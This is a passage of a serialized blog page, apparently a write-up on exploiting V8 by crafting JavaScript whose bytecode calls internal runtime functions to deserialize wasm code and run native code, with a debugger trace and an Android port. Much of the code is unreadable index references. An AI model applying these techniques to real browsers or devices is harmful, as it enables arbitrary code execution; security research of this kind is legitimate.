,[3472],{"type":33,"value":1123},{"type":27,"tag":207,"props":3474,"children":3475},{"style":232},[3476],{"type":33,"value":1660},{"type":27,"tag":207,"props":3478,"children":3479},{"style":238},[3480],{"type":33,"value":1123},{"type":27,"tag":207,"props":3482,"children":3483},{"style":232},[3484],{"type":33,"value":1660},{"type":27,"tag":207,"props":3486,"children":3487},{"style":238},[3488],{"type":33,"value":1123},{"type":27,"tag":207,"props":3490,"children":3491},{"style":232},[3492],{"type":33,"value":1660},{"type":27,"tag":207,"props":3494,"children":3495},{"style":238},[3496],{"type":33,"value":1123},{"type":27,"tag":207,"props":3498,"children":3499},{"style":232},[3500],{"type":33,"value":1660},{"type":27,"tag":207,"props":3502,"children":3503},{"style":238},[3504],{"type":33,"value":1123},{"type":27,"tag":207,"props":3506,"children":3507},{"style":232},[3508],{"type":33,"value":1660},{"type":27,"tag":207,"props":3510,"children":3511},{"style":238},[3512],{"type":33,"value":1123},{"type":27,"tag":207,"props":3514,"children":3515},{"style":232},[3516],{"type":33,"value":1660},{"type":27,"tag":207,"props":3518,"children":3519},{"style":238},[3520],{"type":33,"value":1123},{"type":27,"tag":207,"props":3522,"children":3523},{"style":232},[3524],{"type":33,"value":1744},{"type":27,"tag":207,"props":3526,"children":3527},{"style":238},[3528],{"type":33,"value":1123},{"type":27,"tag":207,"props":3530,"children":3531},{"style":232},[3532],{"type":33,"value":3533},"204",{"type":27,"tag":207,"props":3535,"children":3536},{"style":238},[3537],{"type":33,"value":1123},{"type":27,"tag":207,"props":3539,"children":3540},{"style":232},[3541],{"type":33,"value":3542},"72",{"type":27,"tag":207,"props":3544,"children":3545},{"style":238},[3546],{"type":33,"value":1123},{"type":27,"tag":207,"props":3548,"children":3549},{"style":232},[3550],{"type":33,"value":3551},"137",{"type":27,"tag":207,"props":3553,"children":3554},{"style":238},[3555],{"type":33,"value":1123},{"type":27,"tag":207,"props":3557,"children":3558},{"style":232},[3559],{"type":33,"value":3560},"229",{"type":27,"tag":207,"props":3562,"children":3563},{"style":238},[3564],{"type":33,"value":1123},{"type":27,"tag":207,"props":3566,"children":3567},{"style":232},[3568],{"type":33,"value":3569},"106",{"type":27,"tag":207,"props":3571,"children":3572},{"style":238},[3573],{"type":33,"value":1123},{"type":27,"tag":207,"props":3575,"children":3576},{"style":232},[3577],{"type":33,"value":3578},"8",{"type":27,"tag":207,"props":3580,"children":3581},{"style":238},[3582],{"type":33,"value":1123},{"type":27,"tag":207,"props":3584,"children":3585},{"style":232},[3586],{"type":33,"value":3587},"86",{"type":27,"tag":207,"props":3589,"children":3590},{"style":238},[3591],{"type":33,"value":1123},{"type":27,"tag":207,"props":3593,"children":3594},{"style":232},[3595],{"type":33,"value":3542},{"type":27,"tag":207,"props":3597,"children":3598},{"style":238},[3599],{"type":33,"value":1123},{"type":27,"tag":207,"props":3601,"children":3602},{"style":232},[3603],{"type":33,"value":3604},"139",{"type":27,"tag":207,"props":3606,"children":3607},{"style":238},[3608],{"type":33,"value":1123},{"type":27,"tag":207,"props":3610,"children":3611},{"style":232},[3612],{"type":33,"value":3560},{"type":27,"tag":207,"props":3614,"children":3615},{"style":238},[3616],{"type":33,"value":1123},{"type":27,"tag":207,"props":3618,"children":3619},{"style":232},[3620],{"type":33,"value":3621},"93",{"type":27,"tag":207,"props":3623,"children":3624},{"style":238},[3625],{"type":33,"value":1842},{"type":27,"tag":207,"props":3627,"children":3628},{"class":209,"line":2130},[3629,3634,3638,3643,3647,3652,3656,3661,3665,3669,3673,3677,3681,3685,3689,3693,3697,3701,3705,3709,3713,3717,3721,3725,3729,3733,3737,3741,3745,3749,3753,3757,3761,3765,3769,3773,3777,3781,3785,3789,3793,3797,3801,3805,3809,3813,3817,3821,3825,3829,3833,3837,3841,3845,3849,3853,3857,3861,3865,3869],{"type":27,"tag":207,"props":3630,"children":3631},{"style":232},[3632],{"type":33,"value":3633}," 195",{"type":27,"tag":207,"props":3635,"children":3636},{"style":238},[3637],{"type":33,"value":1123},{"type":27,"tag":207,"props":3639,"children":3640},{"style":232},[3641],{"type":33,"value":3642},"144",{"type":27,"tag":207,"props":3644,"children":3645},{"style":238},[3646],{"type":33,"value":1123},{"type":27,"tag":207,"props":3648,"children":3649},{"style":232},[3650],{"type":33,"value":3651},"15",{"type":27,"tag":207,"props":3653,"children":3654},{"style":238},[3655],{"type":33,"value":1123},{"type":27,"tag":207,"props":3657,"children":3658},{"style":232},[3659],{"type":33,"value":3660},"31",{"type":27,"tag":207,"props":3662,"children":3663},{"style":238},[3664],{"type":33,"value":1123},{"type":27,"tag":207,"props":3666,"children":3667},{"style":232},[3668],{"type":33,"value":1660},{"type":27,"tag":207,"props":3670,"children":3671},{"style":238},[3672],{"type":33,"value":1123},{"type":27,"tag":207,"props":3674,"children":3675},{"style":232},[3676],{"type":33,"value":1693},{"type":27,"tag":207,"props":3678,"children":3679},{"style":238},[3680],{"type":33,"value":1123},{"type":27,"tag":207,"props":3682,"children":3683},{"style":232},[3684],{"type":33,"value":1660},{"type":27,"tag":207,"props":3686,"children":3687},{"style":238},[3688],{"type":33,"value":1123},{"type":27,"tag":207,"props":3690,"children":3691},{"style":232},[3692],{"type":33,"value":1660},{"type":27,"tag":207,"props":3694,"children":3695},{"style":238},[3696],{"type":33,"value":1123},{"type":27,"tag":207,"props":3698,"children":3699},{"style":232},[3700],{"type":33,"value":1660},{"type":27,"tag":207,"props":3702,"children":3703},{"style":238},[3704],{"type":33,"value":1123},{"type":27,"tag":207,"props":3706,"children":3707},{"style":232},[3708],{"type":33,"value":1660},{"type":27,"tag":207,"props":3710,"children":3711},{"style":238},[3712],{"type":33,"value":1123},{"type":27,"tag":207,"props":3714,"children":3715},{"style":232},[3716],{"type":33,"value":1660},{"type":27,"tag":207,"props":3718,"children":3719},{"style":238},[3720],{"type":33,"value":1123},{"type":27,"tag":207,"props":3722,"children":3723},{"style":232},[3724],{"type":33,"value":1660},{"type":27,"tag":207,"props":3726,"children":3727},{"style":238},[3728],{"type":33,"value":1123},{"type":27,"tag":207,"props":3730,"children":3731},{"style":232},[3732],{"type":33,"value":1660},{"type":27,"tag":207,"props":3734,"children":3735},{"style":238},[3736],{"type":33,"value":1123},{"type":27,"tag":207,"props":3738,"children":3739},{"style":232},[3740],{"type":33,"value":1660},{"type":27,"tag":207,"props":3742,"children":3743},{"style":238},[3744],{"type":33,"value":1123},{"type":27,"tag":207,"props":3746,"children":3747},{"style":232},[3748],{"type":33,"value":1693},{"type":27,"tag":207,"props":3750,"children":3751},{"style":238},[3752],{"type":33,"value":1123},{"type":27,"tag":207,"props":3754,"children":3755},{"style":232},[3756],{"type":33,"value":1660},{"type":27,"tag":207,"props":3758,"children":3759},{"style":238},[3760],{"type":33,"value":1123},{"type":27,"tag":207,"props":3762,"children":3763},{"style":232},[3764],{"type":33,"value":1660},{"type":27,"tag":207,"props":3766,"children":3767},{"style":238},[3768],{"type":33,"value":1123},{"type":27,"tag":207,"props":3770,"children":3771},{"style":232},[3772],{"type":33,"value":1660},{"type":27,"tag":207,"props":3774,"children":3775},{"style":238},[3776],{"type":33,"value":1123},{"type":27,"tag":207,"props":3778,"children":3779},{"style":232},[3780],{"type":33,"value":1660},{"type":27,"tag":207,"props":3782,"children":3783},{"style":238},[3784],{"type":33,"value":1123},{"type":27,"tag":207,"props":3786,"children":3787},{"style":232},[3788],{"type":33,"value":1660},{"type":27,"tag":207,"props":3790,"children":3791},{"style":238},[3792],{"type":33,"value":1123},{"type":27,"tag":207,"props":3794,"children":3795},{"style":232},[3796],{"type":33,"value":1660},{"type":27,"tag":207,"props":3798,"children":3799},{"style":238},[3800],{"type":33,"value":1123},{"type":27,"tag":207,"props":3802,"children":3803},{"style":232},[3804],{"type":33,"value":1660},{"type":27,"tag":207,"props":3806,"children":3807},{"style":238},[3808],{"type":33,"value":1123},{"type":27,"tag":207,"props":3810,"children":3811},{"style":232},[3812],{"type":33,"value":1660},{"type":27,"tag":207,"props":3814,"children":3815},{"style":238},[3816],{"type":33,"value":1123},{"type":27,"tag":207,"props":3818,"children":3819},{"style":232},[3820],{"type":33,"value":1660},{"type":27,"tag":207,"props":3822,"children":3823},{"style":238},[3824],{"type":33,"value":1123},{"type":27,"tag":207,"props":3826,"children":3827},{"style":232},[3828],{"type":33,"value":1660},{"type":27,"tag":207,"props":3830,"children":3831},{"style":238},[3832],{"type":33,"value":1123},{"type":27,"tag":207,"props":3834,"children":3835},{"style":232},[3836],{"type":33,"value":1660},{"type":27,"tag":207,"props":3838,"children":3839},{"style":238},[3840],{"type":33,"value":1123},{"type":27,"tag":207,"props":3842,"children":3843},{"style":232},[3844],{"type":33,"value":1660},{"type":27,"tag":207,"props":3846,"children":3847},{"style":238},[3848],{"type":33,"value":1123},{"type":27,"tag":207,"props":3850,"children":3851},{"style":232},[3852],{"type":33,"value":1660},{"type":27,"tag":207,"props":3854,"children":3855},{"style":238},[3856],{"type":33,"value":1123},{"type":27,"tag":207,"props":3858,"children":3859},{"style":232},[3860],{"type":33,"value":1660},{"type":27,"tag":207,"props":3862,"children":3863},{"style":238},[3864],{"type":33,"value":1123},{"type":27,"tag":207,"props":3866,"children":3867},{"style":232},[3868],{"type":33,"value":1660},{"type":27,"tag":207,"props":3870,"children":3871},{"style":238},[3872],{"type":33,"value":1842},{"type":27,"tag":207,"props":3874,"children":3875},{"class":209,"line":2168},[3876,3880,3884,3888,3892,3896,3900,3904,3908,3912,3916,3920,3924,3928,3932,3936,3940,3944,3948,3952,3956,3960,3964,3968,3972,3976,3980,3984,3988,3992,3996,4000,4004,4008,4012,4016,4020,4024,4028,4032,4036,4040,4044,4048,4052,4056,4060,4064,4068,4072,4076,4081,4085,4089],{"type":27,"tag":207,"props":3877,"children":3878},{"style":232},[3879],{"type":33,"value":2361},{"type":27,"tag":207,"props":3881,"children":3882},{"style":238},[3883],{"type":33,"value":1123},{"type":27,"tag":207,"props":3885,"children":3886},{"style":232},[3887],{"type":33,"value":1660},{"type":27,"tag":207,"props":3889,"children":3890},{"style":238},[3891],{"type":33,"value":1123},{"type":27,"tag":207,"props":3893,"children":3894},{"style":232},[3895],{"type":33,"value":1660},{"type":27,"tag":207,"props":3897,"children":3898},{"style":238},[3899],{"type":33,"value":1123},{"type":27,"tag":207,"props":3901,"children":3902},{"style":232},[3903],{"type":33,"value":1660},{"type":27,"tag":207,"props":3905,"children":3906},{"style":238},[3907],{"type":33,"value":1123},{"type":27,"tag":207,"props":3909,"children":3910},{"style":232},[3911],{"type":33,"value":1660},{"type":27,"tag":207,"props":3913,"children":3914},{"style":238},[3915],{"type":33,"value":1123},{"type":27,"tag":207,"props":3917,"children":3918},{"style":232},[3919],{"type":33,"value":1660},{"type":27,"tag":207,"props":3921,"children":3922},{"style":238},[3923],{"type":33,"value":1123},{"type":27,"tag":207,"props":3925,"children":3926},{"style":232},[3927],{"type":33,"value":1660},{"type":27,"tag":207,"props":3929,"children":3930},{"style":238},[3931],{"type":33,"value":1123},{"type":27,"tag":207,"props":3933,"children":3934},{"style":232},[3935],{"type":33,"value":1660},{"type":27,"tag":207,"props":3937,"children":3938},{"style":238},[3939],{"type":33,"value":1123},{"type":27,"tag":207,"props":3941,"children":3942},{"style":232},[3943],{"type":33,"value":1660},{"type":27,"tag":207,"props":3945,"children":3946},{"style":238},[3947],{"type":33,"value":1123},{"type":27,"tag":207,"props":3949,"children":3950},{"style":232},[3951],{"type":33,"value":1660},{"type":27,"tag":207,"props":3953,"children":3954},{"style":238},[3955],{"type":33,"value":1123},{"type":27,"tag":207,"props":3957,"children":3958},{"style":232},[3959],{"type":33,"value":1660},{"type":27,"tag":207,"props":3961,"children":3962},{"style":238},[3963],{"type":33,"value":1123},{"type":27,"tag":207,"props":3965,"children":3966},{"style":232},[3967],{"type":33,"value":1660},{"type":27,"tag":207,"props":3969,"children":3970},{"style":238},[3971],{"type":33,"value":1123},{"type":27,"tag":207,"props":3973,"children":3974},{"style":232},[3975],{"type":33,"value":1660},{"type":27,"tag":207,"props":3977,"children":3978},{"style":238},[3979],{"type":33,"value":1123},{"type":27,"tag":207,"props":3981,"children":3982},{"style":232},[3983],{"type":33,"value":1660},{"type":27,"tag":207,"props":3985,"children":3986},{"style":238},[3987],{"type":33,"value":1123},{"type":27,"tag":207,"props":3989,"children":3990},{"style":232},[3991],{"type":33,"value":1660},{"type":27,"tag":207,"props":3993,"children":3994},{"style":238},[3995],{"type":33,"value":1123},{"type":27,"tag":207,"props":3997,"children":3998},{"style":232},[3999],{"type":33,"value":1660},{"type":27,"tag":207,"props":4001,"children":4002},{"style":238},[4003],{"type":33,"value":1123},{"type":27,"tag":207,"props":4005,"children":4006},{"style":232},[4007],{"type":33,"value":1660},{"type":27,"tag":207,"props":4009,"children":4010},{"style":238},[4011],{"type":33,"value":1123},{"type":27,"tag":207,"props":4013,"children":4014},{"style":232},[4015],{"type":33,"value":1660},{"type":27,"tag":207,"props":4017,"children":4018},{"style":238},[4019],{"type":33,"value":1123},{"type":27,"tag":207,"props":4021,"children":4022},{"style":232},[4023],{"type":33,"value":1660},{"type":27,"tag":207,"props":4025,"children":4026},{"style":238},[4027],{"type":33,"value":1123},{"type":27,"tag":207,"props":4029,"children":4030},{"style":232},[4031],{"type":33,"value":1660},{"type":27,"tag":207,"props":4033,"children":4034},{"style":238},[4035],{"type":33,"value":1123},{"type":27,"tag":207,"props":4037,"children":4038},{"style":232},[4039],{"type":33,"value":1660},{"type":27,"tag":207,"props":4041,"children":4042},{"style":238},[4043],{"type":33,"value":1123},{"type":27,"tag":207,"props":4045,"children":4046},{"style":232},[4047],{"type":33,"value":1660},{"type":27,"tag":207,"props":4049,"children":4050},{"style":238},[4051],{"type":33,"value":1123},{"type":27,"tag":207,"props":4053,"children":4054},{"style":232},[4055],{"type":33,"value":1660},{"type":27,"tag":207,"props":4057,"children":4058},{"style":238},[4059],{"type":33,"value":1123},{"type":27,"tag":207,"props":4061,"children":4062},{"style":232},[4063],{"type":33,"value":2889},{"type":27,"tag":207,"props":4065,"children":4066},{"style":238},[4067],{"type":33,"value":1123},{"type":27,"tag":207,"props":4069,"children":4070},{"style":232},[4071],{"type":33,"value":3621},{"type":27,"tag":207,"props":4073,"children":4074},{"style":238},[4075],{"type":33,"value":1123},{"type":27,"tag":207,"props":4077,"children":4078},{"style":232},[4079],{"type":33,"value":4080},"198",{"type":27,"tag":207,"props":4082,"children":4083},{"style":238},[4084],{"type":33,"value":1123},{"type":27,"tag":207,"props":4086,"children":4087},{"style":232},[4088],{"type":33,"value":1660},{"type":27,"tag":207,"props":4090,"children":4091},{"style":238},[4092],{"type":33,"value":1842},{"type":27,"tag":207,"props":4094,"children":4096},{"class":209,"line":4095},13,[4097],{"type":27,"tag":207,"props":4098,"children":4099},{"style":238},[4100],{"type":33,"value":2648},{"type":27,"tag":207,"props":4102,"children":4104},{"class":209,"line":4103},14,[4105,4109,4114,4118,4123,4127,4131,4135,4140,4144,4148],{"type":27,"tag":207,"props":4106,"children":4107},{"style":214},[4108],{"type":33,"value":425},{"type":27,"tag":207,"props":4110,"children":4111},{"style":220},[4112],{"type":33,"value":4113}," r",{"type":27,"tag":207,"props":4115,"children":4116},{"style":226},[4117],{"type":33,"value":229},{"type":27,"tag":207,"props":4119,"children":4120},{"style":1335},[4121],{"type":33,"value":4122}," bug",{"type":27,"tag":207,"props":4124,"children":4125},{"style":238},[4126],{"type":33,"value":1343},{"type":27,"tag":207,"props":4128,"children":4129},{"style":220},[4130],{"type":33,"value":1962},{"type":27,"tag":207,"props":4132,"children":4133},{"style":238},[4134],{"type":33,"value":1123},{"type":27,"tag":207,"props":4136,"children":4137},{"style":220},[4138],{"type":33,"value":4139},"buffer",{"type":27,"tag":207,"props":4141,"children":4142},{"style":238},[4143],{"type":33,"value":1041},{"type":27,"tag":207,"props":4145,"children":4146},{"style":220},[4147],{"type":33,"value":4139},{"type":27,"tag":207,"props":4149,"children":4150},{"style":238},[4151],{"type":33,"value":1455},{"type":27,"tag":207,"props":4153,"children":4155},{"class":209,"line":4154},15,[4156,4161,4165,4169,4174,4178,4182,4187,4192,4197],{"type":27,"tag":207,"props":4157,"children":4158},{"style":220},[4159],{"type":33,"value":4160}," result",{"type":27,"tag":207,"props":4162,"children":4163},{"style":226},[4164],{"type":33,"value":229},{"type":27,"tag":207,"props":4166,"children":4167},{"style":238},[4168],{"type":33,"value":686},{"type":27,"tag":207,"props":4170,"children":4171},{"style":376},[4172],{"type":33,"value":4173},"await",{"type":27,"tag":207,"props":4175,"children":4176},{"style":220},[4177],{"type":33,"value":4113},{"type":27,"tag":207,"props":4179,"children":4180},{"style":238},[4181],{"type":33,"value":1041},{"type":27,"tag":207,"props":4183,"children":4184},{"style":1335},[4185],{"type":33,"value":4186},"next",{"type":27,"tag":207,"props":4188,"children":4189},{"style":238},[4190],{"type":33,"value":4191},"()).",{"type":27,"tag":207,"props":4193,"children":4194},{"style":220},[4195],{"type":33,"value":4196},"value",{"type":27,"tag":207,"props":4198,"children":4199},{"style":238},[4200],{"type":33,"value":241},{"type":27,"tag":207,"props":4202,"children":4204},{"class":209,"line":4203},16,[4205,4209,4214,4218,4222,4226,4230,4234,4238,4243],{"type":27,"tag":207,"props":4206,"children":4207},{"style":214},[4208],{"type":33,"value":2333},{"type":27,"tag":207,"props":4210,"children":4211},{"style":220},[4212],{"type":33,"value":4213}," wasm_instance",{"type":27,"tag":207,"props":4215,"children":4216},{"style":226},[4217],{"type":33,"value":229},{"type":27,"tag":207,"props":4219,"children":4220},{"style":214},[4221],{"type":33,"value":1597},{"type":27,"tag":207,"props":4223,"children":4224},{"style":220},[4225],{"type":33,"value":1944},{"type":27,"tag":207,"props":4227,"children":4228},{"style":238},[4229],{"type":33,"value":1041},{"type":27,"tag":207,"props":4231,"children":4232},{"style":1335},[4233],{"type":33,"value":1999},{"type":27,"tag":207,"props":4235,"children":4236},{"style":238},[4237],{"type":33,"value":1343},{"type":27,"tag":207,"props":4239,"children":4240},{"style":220},[4241],{"type":33,"value":4242},"result",{"type":27,"tag":207,"props":4244,"children":4245},{"style":238},[4246],{"type":33,"value":1455},{"type":27,"tag":207,"props":4248,"children":4250},{"class":209,"line":4249},17,[4251,4255,4260,4264,4268,4272,4276,4280,4284],{"type":27,"tag":207,"props":4252,"children":4253},{"style":214},[4254],{"type":33,"value":2333},{"type":27,"tag":207,"props":4256,"children":4257},{"style":220},[4258],{"type":33,"value":4259}," f",{"type":27,"tag":207,"props":4261,"children":4262},{"style":226},[4263],{"type":33,"value":229},{"type":27,"tag":207,"props":4265,"children":4266},{"style":220},[4267],{"type":33,"value":4213},{"type":27,"tag":207,"props":4269,"children":4270},{"style":238},[4271],{"type":33,"value":1041},{"type":27,"tag":207,"props":4273,"children":4274},{"style":220},[4275],{"type":33,"value":2041},{"type":27,"tag":207,"props":4277,"children":4278},{"style":238},[4279],{"type":33,"value":1041},{"type":27,"tag":207,"props":4281,"children":4282},{"style":220},[4283],{"type":33,"value":2050},{"type":27,"tag":207,"props":4285,"children":4286},{"style":238},[4287],{"type":33,"value":241},{"type":27,"tag":207,"props":4289,"children":4291},{"class":209,"line":4290},18,[4292,4297],{"type":27,"tag":207,"props":4293,"children":4294},{"style":1335},[4295],{"type":33,"value":4296}," f",{"type":27,"tag":207,"props":4298,"children":4299},{"style":238},[4300],{"type":33,"value":4301},"();\n",{"type":27,"tag":207,"props":4303,"children":4305},{"class":209,"line":4304},19,[4306],{"type":27,"tag":207,"props":4307,"children":4308},{"style":238},[4309],{"type":33,"value":4310},"})();\n",{"type":27,"tag":36,"props":4312,"children":4313},{},[4314],{"type":33,"value":4315},"Running this in a debugger shows the expected breakpoint:",{"type":27,"tag":101,"props":4317,"children":4319},{"code":4318},"Thread 1 \"d8\" received signal SIGTRAP, Trace/breakpoint trap.\n0x00002ae46bfc1841 in ?? ()\n────────────────────────────────────────────────────────────────────────────\n 0x2ae46bfc183c add BYTE PTR [rax], al\n 0x2ae46bfc183e add BYTE PTR [rax], al\n 0x2ae46bfc1840 int3\n → 0x2ae46bfc1841 mov rbp, rsp\n",[4320],{"type":27,"tag":84,"props":4321,"children":4322},{"__ignoreMap":7},[4323],{"type":33,"value":4318},{"type":27,"tag":58,"props":4325,"children":4327},{"id":4326},"porting-to-android",[4328],{"type":33,"value":4329},"Porting to Android",{"type":27,"tag":36,"props":4331,"children":4332},{},[4333,4335,4340,4342,4347,4349,4354,4356,4362],{"type":33,"value":4334},"The serialized x86-64 code can’t be used on the device because the architecture differs, and ",{"type":27,"tag":84,"props":4336,"children":4338},{"className":4337},[],[4339],{"type":33,"value":1039},{"type":33,"value":4341}," fails. We cross-compiled ",{"type":27,"tag":84,"props":4343,"children":4345},{"className":4344},[],[4346],{"type":33,"value":160},{"type":33,"value":4348}," for arm64 and serialized the module there, but this still didn’t work on the device and ",{"type":27,"tag":84,"props":4350,"children":4352},{"className":4351},[],[4353],{"type":33,"value":1039},{"type":33,"value":4355}," returned ",{"type":27,"tag":84,"props":4357,"children":4359},{"className":4358},[],[4360],{"type":33,"value":4361},"undefined",{"type":33,"value":1041},{"type":27,"tag":36,"props":4364,"children":4365},{},[4366,4368,4373,4375,4380],{"type":33,"value":4367},"Instead, we modified the bytecode to call ",{"type":27,"tag":84,"props":4369,"children":4371},{"className":4370},[],[4372],{"type":33,"value":1067},{"type":33,"value":4374}," directly on the device. The idea is to serialize the code on the device and then feed the resulting bytes back into the original bytecode that calls ",{"type":27,"tag":84,"props":4376,"children":4378},{"className":4377},[],[4379],{"type":33,"value":1039},{"type":33,"value":1041},{"type":27,"tag":101,"props":4382,"children":4384},{"code":4383,"language":1570,"meta":7,"className":1571,"style":7},"try {\n ${'a1 + 0xa931111;'.repeat(0x059301 - 1)}\n a1 + 0x03027a6c;\n throw 0x393e71a;\n} catch (e) {\n console.log(\"foo\");\n yield a16;\n}\n",[4385],{"type":27,"tag":84,"props":4386,"children":4387},{"__ignoreMap":7},[4388,4399,4443,4463,4479,4502,4529,4544],{"type":27,"tag":207,"props":4389,"children":4390},{"class":209,"line":210},[4391,4395],{"type":27,"tag":207,"props":4392,"children":4393},{"style":376},[4394],{"type":33,"value":379},{"type":27,"tag":207,"props":4396,"children":4397},{"style":238},[4398],{"type":33,"value":384},{"type":27,"tag":207,"props":4400,"children":4401},{"class":209,"line":244},[4402,4406,4410,4414,4418,4422,4426,4431,4435,4439],{"type":27,"tag":207,"props":4403,"children":4404},{"style":220},[4405],{"type":33,"value":1317},{"type":27,"tag":207,"props":4407,"children":4408},{"style":238},[4409],{"type":33,"value":1322},{"type":27,"tag":207,"props":4411,"children":4412},{"style":1325},[4413],{"type":33,"value":1328},{"type":27,"tag":207,"props":4415,"children":4416},{"style":238},[4417],{"type":33,"value":1041},{"type":27,"tag":207,"props":4419,"children":4420},{"style":1335},[4421],{"type":33,"value":1338},{"type":27,"tag":207,"props":4423,"children":4424},{"style":238},[4425],{"type":33,"value":1343},{"type":27,"tag":207,"props":4427,"children":4428},{"style":232},[4429],{"type":33,"value":4430},"0x059301",{"type":27,"tag":207,"props":4432,"children":4433},{"style":226},[4434],{"type":33,"value":544},{"type":27,"tag":207,"props":4436,"children":4437},{"style":232},[4438],{"type":33,"value":235},{"type":27,"tag":207,"props":4440,"children":4441},{"style":238},[4442],{"type":33,"value":1361},{"type":27,"tag":207,"props":4444,"children":4445},{"class":209,"line":270},[4446,4450,4454,4459],{"type":27,"tag":207,"props":4447,"children":4448},{"style":220},[4449],{"type":33,"value":1369},{"type":27,"tag":207,"props":4451,"children":4452},{"style":226},[4453],{"type":33,"value":1374},{"type":27,"tag":207,"props":4455,"children":4456},{"style":232},[4457],{"type":33,"value":4458}," 0x03027a6c",{"type":27,"tag":207,"props":4460,"children":4461},{"style":238},[4462],{"type":33,"value":241},{"type":27,"tag":207,"props":4464,"children":4465},{"class":209,"line":296},[4466,4470,4475],{"type":27,"tag":207,"props":4467,"children":4468},{"style":376},[4469],{"type":33,"value":392},{"type":27,"tag":207,"props":4471,"children":4472},{"style":232},[4473],{"type":33,"value":4474}," 0x393e71a",{"type":27,"tag":207,"props":4476,"children":4477},{"style":238},[4478],{"type":33,"value":241},{"type":27,"tag":207,"props":4480,"children":4481},{"class":209,"line":445},[4482,4486,4490,4494,4498],{"type":27,"tag":207,"props":4483,"children":4484},{"style":238},[4485],{"type":33,"value":408},{"type":27,"tag":207,"props":4487,"children":4488},{"style":376},[4489],{"type":33,"value":413},{"type":27,"tag":207,"props":4491,"children":4492},{"style":238},[4493],{"type":33,"value":686},{"type":27,"tag":207,"props":4495,"children":4496},{"style":220},[4497],{"type":33,"value":1419},{"type":27,"tag":207,"props":4499,"children":4500},{"style":238},[4501],{"type":33,"value":1424},{"type":27,"tag":207,"props":4503,"children":4504},{"class":209,"line":867},[4505,4509,4513,4517,4521,4525],{"type":27,"tag":207,"props":4506,"children":4507},{"style":220},[4508],{"type":33,"value":1432},{"type":27,"tag":207,"props":4510,"children":4511},{"style":238},[4512],{"type":33,"value":1041},{"type":27,"tag":207,"props":4514,"children":4515},{"style":1335},[4516],{"type":33,"value":1441},{"type":27,"tag":207,"props":4518,"children":4519},{"style":238},[4520],{"type":33,"value":1343},{"type":27,"tag":207,"props":4522,"children":4523},{"style":1325},[4524],{"type":33,"value":1450},{"type":27,"tag":207,"props":4526,"children":4527},{"style":238},[4528],{"type":33,"value":1455},{"type":27,"tag":207,"props":4530,"children":4531},{"class":209,"line":892},[4532,4536,4540],{"type":27,"tag":207,"props":4533,"children":4534},{"style":376},[4535],{"type":33,"value":1463},{"type":27,"tag":207,"props":4537,"children":4538},{"style":220},[4539],{"type":33,"value":1468},{"type":27,"tag":207,"props":4541,"children":4542},{"style":238},[4543],{"type":33,"value":241},{"type":27,"tag":207,"props":4545,"children":4546},{"class":209,"line":1475},[4547],{"type":27,"tag":207,"props":4548,"children":4549},{"style":238},[4550],{"type":33,"value":451},{"type":27,"tag":36,"props":4552,"children":4553},{},[4554,4556,4562,4564,4570,4572,4578,4580,4585,4587,4593,4595,4600,4602,4608],{"type":33,"value":4555},"Here, ",{"type":27,"tag":84,"props":4557,"children":4559},{"className":4558},[],[4560],{"type":33,"value":4561},"a1 + 0x03027a6c",{"type":33,"value":4563}," generates the bytes ",{"type":27,"tag":84,"props":4565,"children":4567},{"className":4566},[],[4568],{"type":33,"value":4569},"01 4b 6c 7a 02 03",{"type":33,"value":4571},", where ",{"type":27,"tag":84,"props":4573,"children":4575},{"className":4574},[],[4576],{"type":33,"value":4577},"0x6c",{"type":33,"value":4579}," is the ",{"type":27,"tag":84,"props":4581,"children":4583},{"className":4582},[],[4584],{"type":33,"value":1023},{"type":33,"value":4586}," opcode, ",{"type":27,"tag":84,"props":4588,"children":4590},{"className":4589},[],[4591],{"type":33,"value":4592},"0x027a",{"type":33,"value":4594}," is the function ID of ",{"type":27,"tag":84,"props":4596,"children":4598},{"className":4597},[],[4599],{"type":33,"value":1067},{"type":33,"value":4601},", and ",{"type":27,"tag":84,"props":4603,"children":4605},{"className":4604},[],[4606],{"type":33,"value":4607},"0x03",{"type":33,"value":4609}," is the register index holding its first argument.",{"type":27,"tag":36,"props":4611,"children":4612},{},[4613,4615,4620,4621,4626,4628,4633],{"type":33,"value":4614},"Our earlier javascript snippet that serialized the wasm module used two native calls: ",{"type":27,"tag":84,"props":4616,"children":4618},{"className":4617},[],[4619],{"type":33,"value":1067},{"type":33,"value":1131},{"type":27,"tag":84,"props":4622,"children":4624},{"className":4623},[],[4625],{"type":33,"value":2076},{"type":33,"value":4627},". To avoid patching the bytecode again to invoke ",{"type":27,"tag":84,"props":4629,"children":4631},{"className":4630},[],[4632],{"type":33,"value":2076},{"type":33,"value":4634},", we can force Turbofan to compile the target function like this:",{"type":27,"tag":101,"props":4636,"children":4638},{"code":4637,"language":1570,"meta":7,"className":1571,"style":7},"// %WasmTierUpFunction(func);\nfor (let i = 0; i \u003C 0x100000; i++) {\n func();\n}\n",[4639],{"type":27,"tag":84,"props":4640,"children":4641},{"__ignoreMap":7},[4642,4651,4718,4730],{"type":27,"tag":207,"props":4643,"children":4644},{"class":209,"line":210},[4645],{"type":27,"tag":207,"props":4646,"children":4648},{"style":4647},"--shiki-default:#6A9955",[4649],{"type":33,"value":4650},"// %WasmTierUpFunction(func);\n",{"type":27,"tag":207,"props":4652,"children":4653},{"class":209,"line":244},[4654,4659,4663,4667,4672,4676,4681,4686,4691,4696,4701,4705,4709,4714],{"type":27,"tag":207,"props":4655,"children":4656},{"style":376},[4657],{"type":33,"value":4658},"for",{"type":27,"tag":207,"props":4660,"children":4661},{"style":238},[4662],{"type":33,"value":686},{"type":27,"tag":207,"props":4664,"children":4665},{"style":214},[4666],{"type":33,"value":217},{"type":27,"tag":207,"props":4668,"children":4669},{"style":220},[4670],{"type":33,"value":4671}," i",{"type":27,"tag":207,"props":4673,"children":4674},{"style":226},[4675],{"type":33,"value":229},{"type":27,"tag":207,"props":4677,"children":4678},{"style":232},[4679],{"type":33,"value":4680}," 0",{"type":27,"tag":207,"props":4682,"children":4683},{"style":238},[4684],{"type":33,"value":4685},"; ",{"type":27,"tag":207,"props":4687,"children":4688},{"style":220},[4689],{"type":33,"value":4690},"i",{"type":27,"tag":207,"props":4692,"children":4693},{"style":226},[4694],{"type":33,"value":4695}," \u003C",{"type":27,"tag":207,"props":4697,"children":4698},{"style":232},[4699],{"type":33,"value":4700}," 